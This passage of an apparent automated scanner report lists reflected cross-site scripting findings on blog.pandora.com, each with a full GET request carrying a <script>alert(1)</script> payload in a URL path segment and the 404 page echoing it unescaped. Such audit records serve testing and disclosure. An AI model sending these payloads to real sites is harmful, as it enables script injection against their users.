Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives2c61d<script>alert(1)</script>b40d4c584c3/2010/11/sioux-falls-and.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f834<script>alert(1)</script>c656c2ef387 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20105f834<script>alert(1)</script>c656c2ef387/11/sioux-falls-and.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20105f834<script>alert(1)</script>c656c2ef387/11/sioux-falls-and.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4a98f<script>alert(1)</script>e7866274f68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/114a98f<script>alert(1)</script>e7866274f68/sioux-falls-and.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/114a98f<script>alert(1)</script>e7866274f68/sioux-falls-and.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 83ec8<script>alert(1)</script>d52c4849003 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11/sioux-falls-and.html83ec8<script>alert(1)</script>d52c4849003 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/11/sioux-falls-and.html83ec8<script>alert(1)</script>d52c4849003 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2056f<script>alert(1)</script>3737c338528 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2056f<script>alert(1)</script>3737c338528/archives/2010/11/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2056f<script>alert(1)</script>3737c338528/archives/2010/11/town-halls-this.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb220<script>alert(1)</script>cbc4db6c337 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archiveseb220<script>alert(1)</script>cbc4db6c337/2010/11/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archiveseb220<script>alert(1)</script>cbc4db6c337/2010/11/town-halls-this.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9fcff<script>alert(1)</script>f60856fbcd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20109fcff<script>alert(1)</script>f60856fbcd/11/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 368
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20109fcff<script>alert(1)</script>f60856fbcd/11/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b86f5<script>alert(1)</script>dbb2a670324 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11b86f5<script>alert(1)</script>dbb2a670324/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11b86f5<script>alert(1)</script>dbb2a670324/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27a11<script>alert(1)</script>950dc27a619 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11/town-halls-this.html27a11<script>alert(1)</script>950dc27a619 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11/town-halls-this.html27a11<script>alert(1)</script>950dc27a619 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bdac6<script>alert(1)</script>af1c2098b93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabdac6<script>alert(1)</script>af1c2098b93/archives/2010/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabdac6<script>alert(1)</script>af1c2098b93/archives/2010/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2a0b4<script>alert(1)</script>fcd5b5c5573 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives2a0b4<script>alert(1)</script>fcd5b5c5573/2010/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives2a0b4<script>alert(1)</script>fcd5b5c5573/2010/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb68a<script>alert(1)</script>703abccb638 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010bb68a<script>alert(1)</script>703abccb638/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010bb68a<script>alert(1)</script>703abccb638/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8e5b4<script>alert(1)</script>6e5ab5102c8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/128e5b4<script>alert(1)</script>6e5ab5102c8/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/128e5b4<script>alert(1)</script>6e5ab5102c8/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bc67e<script>alert(1)</script>34ab249b04a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabc67e<script>alert(1)</script>34ab249b04a/archives/2010/12/holiday-music.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabc67e<script>alert(1)</script>34ab249b04a/archives/2010/12/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cc4e<script>alert(1)</script>4b764c67cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9cc4e<script>alert(1)</script>4b764c67cc/2010/12/holiday-music.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 366
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9cc4e<script>alert(1)</script>4b764c67cc/2010/12/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bd53e<script>alert(1)</script>7f56f5a8144 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010bd53e<script>alert(1)</script>7f56f5a8144/12/holiday-music.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010bd53e<script>alert(1)</script>7f56f5a8144/12/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)</script>e925b373d1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1284903<script>alert(1)</script>e925b373d1b/holiday-music.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/1284903<script>alert(1)</script>e925b373d1b/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e86cc<script>alert(1)</script>2286b5dabd7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/12/holiday-music.htmle86cc<script>alert(1)</script>2286b5dabd7 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/12/holiday-music.htmle86cc<script>alert(1)</script>2286b5dabd7 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d3cd<script>alert(1)</script>a8a76e357fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5d3cd<script>alert(1)</script>a8a76e357fe/archives/2010/12/themed-stations.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora5d3cd<script>alert(1)</script>a8a76e357fe/archives/2010/12/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25283<script>alert(1)</script>32ad766d12b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives25283<script>alert(1)</script>32ad766d12b/2010/12/themed-stations.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
